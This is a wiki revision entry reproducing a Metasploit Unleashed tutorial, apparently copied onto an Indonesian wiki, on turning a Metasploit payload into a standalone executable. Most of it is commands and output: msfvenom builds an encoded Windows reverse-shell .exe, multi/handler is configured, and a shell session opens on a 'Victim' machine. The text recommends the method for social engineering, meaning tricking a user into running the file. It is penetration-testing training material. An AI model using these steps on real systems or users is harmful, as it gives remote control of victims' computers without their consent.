https://onnocenter.or.id/wiki/index.php?action=history&feed=atom&title=MSF%3A_Binary_PayloadsMSF: Binary Payloads - Revision history2026-04-07T12:11:07ZRevision history for this page on the wikiMediaWiki 1.35.4https://onnocenter.or.id/wiki/index.php?title=MSF:_Binary_Payloads&diff=62122&oldid=prevOnnowpurbo: Created page with "Sumber: https://www.offensive-security.com/metasploit-unleashed/binary-payloads/ It seems like Metasploit is full of interesting and useful features. One of these is the ab..."2020-07-27T09:48:41Z<p>Created page with "Sumber: https://www.offensive-security.com/metasploit-unleashed/binary-payloads/ It seems like Metasploit is full of interesting and useful features. One of these is the ab..."</p>
<p><b>New page</b></p><div>Sumber: https://www.offensive-security.com/metasploit-unleashed/binary-payloads/<br />
<br />
<br />
<br />
It seems like Metasploit is full of interesting and useful features. One of these is the ability to generate an executable from a Metasploit payload. This can be very useful in situations such as social engineering; if you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software.<br />
<br />
Let’s look at a quick example of how to do this. We will generate a reverse shell payload, execute it on a remote system, and get our shell. To do this, we will use the command line tool msfvenom. This command can be used for generating payloads to be used in many locations and offers a variety of output options, from perl to C to raw. We are interested in the executable output, which is provided by the -f exe option.<br />
<br />
We’ll generate a Windows reverse shell executable that will connect back to us on port 31337.<br />
<br />
root@kali:~# msfvenom --payload-options -p windows/shell/reverse_tcp<br />
Options for payload/windows/shell/reverse_tcp:<br />
<br />
<br />
Name: Windows Command Shell, Reverse TCP Stager<br />
Module: payload/windows/shell/reverse_tcp<br />
Platform: Windows<br />
Arch: x86<br />
Needs Admin: No<br />
Total size: 281<br />
Rank: Normal<br />
<br />
Provided by:<br />
spoonm <br />
sf <br />
hdm <br />
skape <br />
<br />
Basic options:<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)<br />
LHOST yes The listen address<br />
LPORT 4444 yes The listen port<br />
<br />
Description:<br />
Spawn a piped command shell (staged). Connect back to the attacker<br />
root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe<br />
Found 1 compatible encoders<br />
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai<br />
x86/shikata_ga_nai succeeded with size 326 (iteration=0)<br />
x86/shikata_ga_nai chosen with final size 326<br />
Payload size: 326 bytes<br />
Saved as: /tmp/1.exe<br />
<br />
root@kali:~# file /tmp/1.exe<br />
/tmp/1.exe: PE32 executable (GUI) Intel 80386, for MS Windows<br />
Now we see we have a Windows executable ready to go. Now, we will use multi/handler, which is a stub that handles exploits launched outside of the framework.<br />
<br />
root@kali:~# msfconsole -q<br />
msf > use exploit/multi/handler<br />
msf exploit(handler) > show options<br />
<br />
Module options:<br />
<br />
Name Current Setting Required Description <br />
---- --------------- -------- ----------- <br />
<br />
<br />
Exploit target:<br />
<br />
Id Name <br />
-- ---- <br />
0 Wildcard Target<br />
When using the exploit/multi/handler module, we still need to tell it which payload to expect so we configure it to have the same settings as the executable we generated.<br />
<br />
msf exploit(handler) > set payload windows/shell/reverse_tcp<br />
payload => windows/shell/reverse_tcp<br />
msf exploit(handler) > show options<br />
<br />
Module options:<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
<br />
<br />
Payload options (windows/shell/reverse_tcp):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
EXITFUNC thread yes Exit technique: seh, thread, process<br />
LHOST yes The local address<br />
LPORT 4444 yes The local port<br />
<br />
<br />
Exploit target:<br />
<br />
Id Name<br />
-- ----<br />
0 Wildcard Target <br />
<br />
<br />
msf exploit(handler) > set LHOST 172.16.104.130<br />
LHOST => 172.16.104.130<br />
msf exploit(handler) > set LPORT 31337<br />
LPORT => 31337<br />
msf exploit(handler) ><br />
Now that we have everything set up and ready to go, we run exploit for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us our shell.<br />
<br />
msf exploit(handler) > exploit<br />
<br />
[*] Handler binding to LHOST 0.0.0.0<br />
[*] Started reverse handler<br />
[*] Starting the payload handler...<br />
[*] Sending stage (474 bytes)<br />
[*] Command shell session 2 opened (172.16.104.130:31337 -> 172.16.104.128:1150)<br />
<br />
Microsoft Windows XP [Version 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.<br />
<br />
C:\Documents and Settings\Victim\My Documents><br />
‹ PREVIOUS PAGE<br />
<br />
<br />
<br />
<br />
<br />
<br />
==Referensi==<br />
<br />
* https://www.offensive-security.com/metasploit-unleashed/binary-payloads/<br />
<br />
==Pranala Menarik==<br />
<br />
* [[Metasploit]]</div>Onnowpurbo